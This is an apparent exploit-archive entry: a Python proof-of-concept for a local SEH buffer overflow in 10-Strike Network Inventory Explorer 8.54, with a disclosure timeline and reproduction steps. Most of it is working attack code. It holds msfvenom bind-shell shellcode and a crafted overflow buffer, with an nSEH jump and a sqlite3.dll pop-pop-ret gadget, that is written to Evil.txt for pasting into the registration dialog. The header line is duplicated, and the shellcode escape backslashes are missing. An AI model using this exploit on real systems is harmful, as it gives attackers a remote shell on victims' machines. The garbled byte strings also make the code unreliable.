10-Strike Network Inventory Explorer Standard 8.54 Registration Key Overflow

#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Sta #!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published

'''
Steps to reproduce:
===================
- Under Help, click 'Enter Registration Key'.
- Paste the contents of Evil.txt and click OK.
Notes:
======
- The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- There is ample space prior to SEH overwrite.
- Pro edition is effected as well.
'''

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -f python -v shellcode
#Payload size: 355 bytes
shellcode = ""
shellcode += "xbfxadxa8x1ex44xddxc0xd9x74x24xf4x5e"
shellcode += "x2bxc9xb1x53x83xc6x04x31x7ex0ex03xd3"
shellcode += "xa6xfcxb1xd7x5fx82x3ax27xa0xe3xb3xc2"
shellcode += "x91x23xa7x87x82x93xa3xc5x2ex5fxe1xfd"
shellcode += "xa5x2dx2exf2x0ex9bx08x3dx8exb0x69x5c"
shellcode += "x0cxcbxbdxbex2dx04xb0xbfx6ax79x39xed"
shellcode += "x23xf5xecx01x47x43x2dxaax1bx45x35x4f"
shellcode += "xebx64x14xdex67x3fxb6xe1xa4x4bxffxf9"
shellcode += "xa9x76x49x72x19x0cx48x52x53xedxe7x9b"
shellcode += "x5bx1cxf9xdcx5cxffx8cx14x9fx82x96xe3"
shellcode += "xddx58x12xf7x46x2ax84xd3x77xffx53x90"
shellcode += "x74xb4x10xfex98x4bxf4x75xa4xc0xfbx59"
shellcode += "x2cx92xdfx7dx74x40x41x24xd0x27x7ex36"
shellcode += "xbbx98xdax3dx56xccx56x1cx3fx21x5bx9e"
shellcode += "xbfx2dxecxedx8dxf2x46x79xbex7bx41x7e"
shellcode += "xc1x51x35x10x3cx5ax46x39xfbx0ex16x51"
shellcode += "x2ax2fxfdxa1xd3xfax68xa9x72x55x8fx54"
shellcode += "xc4x05x0fxf6xadx4fx80x29xcdx6fx4ax42"
shellcode += "x66x92x75x7dx2bx1bx93x17xc3x4dx0bx8f"
shellcode += "x21xaax84x28x59x98xbcxdex12xcax7bxe1"
shellcode += "xa2xd8x2bx75x29x0fxe8x64x2ex1ax58xf1"
shellcode += "xb9xd0x09xb0x58xe4x03x22xf8x77xc8xb2"
shellcode += "x77x64x47xe5xd0x5ax9ex63xcdxc5x08x91"
shellcode += "x0cx93x73x11xcbx60x7dx98x9exddx59x8a"
shellcode += "x66xddxe5xfex36x88xb3xa8xf0x62x72x02"
shellcode += "xabxd9xdcxc2x2ax12xdfx94x32x7fxa9x78"
shellcode += "x82xd6xecx87x2bxbfxf8xf0x51x5fx06x2b"
shellcode += "xd2x6fx4dx71x73xf8x08xe0xc1x65xabxdf"
shellcode += "x06x90x28xd5xf6x67x30x9cxf3x2cxf6x4d"
shellcode += "x8ex3dx93x71x3dx3dxb6"

buffer = 'x41' * 4188 # filler to nSEH
buffer += 'x75x06x74x06' # nSEH | jump net
buffer += 'x7ax49xe8x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += 'x90' * 8 # nops
buffer += shellcode # bind shell
buffer += 'x41' * (5000-4188-16-len(shellcode)) # junk

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e